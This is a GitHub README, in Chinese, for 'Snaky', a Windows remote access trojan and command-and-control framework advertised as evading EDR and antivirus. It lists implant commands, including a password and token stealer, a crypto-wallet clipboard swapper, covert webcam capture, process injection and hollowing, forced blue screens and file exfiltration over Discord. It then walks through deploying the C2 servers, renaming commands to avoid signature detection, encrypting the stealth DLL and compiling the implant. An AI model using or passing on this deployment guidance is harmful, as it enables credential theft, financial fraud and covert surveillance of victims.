uzokingkong/SNK-RAT
GitHub: uzokingkong/SNK-RAT
Snaky 是一款基于 Rust 与 Nim 混合架构的 Windows 红队 C2 框架,旨在演示和测试现代 EDR 规避技术。
Stars: 1 | Forks: 0
## 简介
Snaky 是一个出于 PoC(概念验证)目的而开发的 Windows 远程访问木马(RAT)和命令与控制(C2)框架。
它采用混合架构,结合了高性能的 Rust 加载器和经过深度混淆的 Nim 隐蔽引擎,旨在绕过现代 EDR 和 AV 解决方案(使其更加完美……)。该项目集成了各种攻击技术、无文件执行概念以及实时远程管理功能。
## 免责声明
本项目是出于个人对网络安全研究和 EDR 规避技术的兴趣而开发的。请勿将此软件用于任何非法活动。
开发者不对任何滥用或本程序造成的损害承担任何责任。仅在授权环境中使用。
## 警告
在构建过程或执行期间,杀毒软件或 EDR 可能会检测到某些组件,并自动阻止或删除它们。对于攻击性安全工具而言,这是正常且预期的行为。
https://github.com/user-attachments/assets/306c4005-a9b4-47d0-b565-e84d9d55e8f2
## 网络架构
### 系统架构详情
要深入了解 Rust implant、Cloudflare Worker 和 Nim 隐蔽引擎如何交互,请参阅技术指南。
## 命令目录(CLI 树)
Discord C2 界面映射了传统的终端体验。以下是按内部模块路由分类的受支持命令的完整明细。所有命令均以 `.` 为前缀(可配置)。
```
root/
├── core/
│ ├── auth - C2 authentication & registration.
│ ├── help - List commands and detailed usage.
│ ├── info - Target recon (OS, hardware, perms).
│ ├── ping - Measure C2/Implant latency.
│ ├── shell - Execute direct CMD/PowerShell.
│ ├── exit - Shutdown the implant process.
│ ├── uninstall - Remove persistence and self-delete.
│ └── refresh - Restart the implant instance.
│
├── filesystem/
│ ├── ls & cd - Directory listing and navigation.
│ ├── mkdir & rm - Create or delete files/folders.
│ ├── cp & mv - Copy, move, or rename paths.
│ ├── cat - Read and display file contents.
│ ├── size - Calculate path size recursively.
│ ├── pwd - Print current working directory.
│ ├── search - Find files using glob patterns.
│ ├── upload - Drop files to target via Discord.
│ ├── download - Exfiltrate files from target to C2.
│ └── zip & unzip - Compress or extract archives.
│
├── system/
│ ├── process - Enum, kill, hollow, inject, or stomp.
│ ├── monitor - Real-time CPU, RAM, Disk telemetry.
│ ├── visible - Set executable window visibility.
│ ├── bsod - Trigger instant Blue Screen of Death.
│ ├── crashps - Crash target via PowerShell bomb.
│ ├── screen - Control brightness or turn off panels.
│ ├── remote - Live WebRTC-based screen share.
│ ├── record - Record desktop to MP4 video.
│ ├── stealer - Extract passes, tokens, and sessions.
│ ├── update - OTA binary update (attachment/URL).
│ ├── volume - Control system audio levels.
│ ├── windowops - Manage active windows (min/max/close).
│ └── kctshell - Silent execution via KCT hijacking.
│
├── utility/
│ ├── clipper - Crypto-wallet address swapper.
│ ├── clipboard - Get or set system clipboard text.
│ ├── jumpscare - Fullscreen image + max volume audio.
│ ├── screenshot - Capture multiple monitor displays.
│ ├── webcam - Stealthy camera frame capture.
│ ├── foreground - Sniff active window activity log.
│ └── openurl - Launch URLs in the default browser.
│
└── crypto_net/
├── netinfo - Public/Private IP & ISP metadata.
└── nslookup - Perform forward/reverse DNS queries.
```
## 编译与部署
部署遵循逻辑顺序:**基础设施设置 -> 客户端配置 -> 最终编译。**
需要 Rust(Windows GNU/MSVC)和 Nim 环境。
### 步骤 1:部署 C2 基础设施
在构建 agent 之前,您必须激活 C2 监听器以获取您的 endpoint URL。
#### 选项 A:Serverless(Cloudflare Workers) - *推荐*
1. 安装 [Wrangler CLI](https://developers.cloudflare.com/workers/wrangler/install-setup/)。
2. 部署代理处理器:
cd worker && wrangler deploy
cd ../screen-share-worker && wrangler deploy
3. 复制生成的 `.workers.dev` URL
#### 选项 B:自托管(Node.js 服务器)
1. 确保您的 VPS 上已安装 Node.js 18+。
2. 设置并启动:
cd worker && npm install && npm run start
### 步骤 2:配置客户端设置
现在,将您的基础设施详细信息注入到 agent 的源代码中。
1. **C2 Endpoints**:编辑 `snaky_rust_win/src/settings.rs`
* 将您的 Cloudflare/VPS URL 粘贴到 `C2_PRIMARY` 和 `C2_BACKUP` 中。
* 设置一个强健的 `SHARED_SECRET`(必须与您的 Worker/Server 配置中的密钥相匹配)。
2. **隐蔽标识**:编辑 `snaky_rust_win/stego_strings.json`
* 自定义命令名称和描述,以规避基于特征的检测。
3. **视觉品牌**:替换 `snaky_rust_win/assets/setting.ico`
* 只需使用您想要的 `.ico` 文件覆盖此文件即可更改可执行文件图标。
### 步骤 3:多阶段构建流程
#### 1. 编译隐蔽引擎(Nim)
这将生成核心规避模块。
```
cd nim_stealth
nim c -d:release --app:lib --cpu:amd64 --opt:size --out:../snaky_rust_win/stealth.dll libstealth.nim
```
#### 2. 加密隐蔽引擎
使用 XOR 包装器将 DLL 转换为多态 blob。
```
cd ../snaky_rust_win
python encrypt_stealth.py
```
#### 3. 编译最终 Implant(Rust)
Rust 编译器将打包加密的 Nim 引擎和隐写资源。
```
cargo build --release
```
最终可直接使用的 agent 位于:`target/release/snaky.exe`。
## 演示
## 许可证
本项目基于 MIT 许可证授权 - 有关详细信息,请参阅 [LICENSE](LICENSE) 文件。
## 鸣谢
向所有与社区分享知识的网络安全专业人士、恶意软件研究人员和攻击性工具开发者致敬!
标签:C2框架, Chrome扩展, DNS 反向解析, IP 地址批量处理, MITM代理, Nim, Rust, 免杀技术, 可视化界面, 安全学习资源, 暴力破解检测, 程序员工具, 网络信息收集, 网络流量审计, 远控木马, 通知系统